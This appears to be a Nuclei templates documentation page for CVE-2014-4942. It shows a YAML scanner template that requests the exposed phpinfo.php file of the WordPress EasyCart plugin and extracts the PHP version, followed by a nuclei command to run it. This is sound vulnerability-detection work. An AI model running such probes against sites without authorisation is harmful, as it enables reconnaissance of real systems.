Skip to content
Nuclei Templates

WordPress EasyCart <2.0.6 - Information Disclosure

ID: CVE-2014-4942

Severity: medium

Author: DhiyaneshDk

Tags: cve2014,cve,wpscan,wordpress,wp-plugin,wp,phpinfo,disclosure,levelfourdevelopment

Description

Section titled “Description”

WordPress EasyCart plugin before 2.0.6 contains an information disclosure vulnerability. An attacker can obtain configuration information via a direct request to inc/admin/phpinfo.php, which calls the phpinfo function.

YAML Source

Section titled “YAML Source”
id: CVE-2014-4942


info:
  name: WordPress EasyCart <2.0.6 - Information Disclosure
  author: DhiyaneshDk
  severity: medium
  description: |
    WordPress EasyCart plugin before 2.0.6 contains an information disclosure vulnerability. An attacker can obtain configuration information via a direct request to inc/admin/phpinfo.php, which calls the phpinfo function.
  impact: |
    An attacker can gain sensitive information from the target system.
  remediation: |
    Upgrade to WordPress EasyCart version 2.0.6 or later.
  reference:
    - https://wpscan.com/vulnerability/64ea4135-eb26-4dea-a13f-f4c1deb77150
    - https://codevigilant.com/disclosure/wp-plugin-wp-easycart-information-disclosure
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4942
    - https://nvd.nist.gov/vuln/detail/CVE-2014-4942
    - https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=829290%40wp-easycart&old=827627%40wp-easycart&sfp_email=&sfph_mail=
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
    cvss-score: 5
    cve-id: CVE-2014-4942
    cwe-id: CWE-200
    epss-score: 0.01024
    epss-percentile: 0.82199
    cpe: cpe:2.3:a:levelfourdevelopment:wp-easycart:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 1
    vendor: levelfourdevelopment
    product: wp-easycart
    framework: wordpress
  tags: cve2014,cve,wpscan,wordpress,wp-plugin,wp,phpinfo,disclosure,levelfourdevelopment


http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/wp-easycart/inc/admin/phpinfo.php"


    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "PHP Extension"
          - "PHP Version"
        condition: and


      - type: status
        status:
          - 200


    extractors:
      - type: regex
        part: body
        group: 1
        regex:
          - '>PHP Version <\/td><td class="v">([0-9.]+)'
# digest: 490a00463044022001f16ad9ea58ef8d189f6480256a2b9b1dac4b4b6ee67b169870bf46240ccbab02202f2ae50806c57edc4c32de4a91f4a9518a53aaa939b620b1898f4ce5d913d593:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2014/CVE-2014-4942.yaml"

View on Github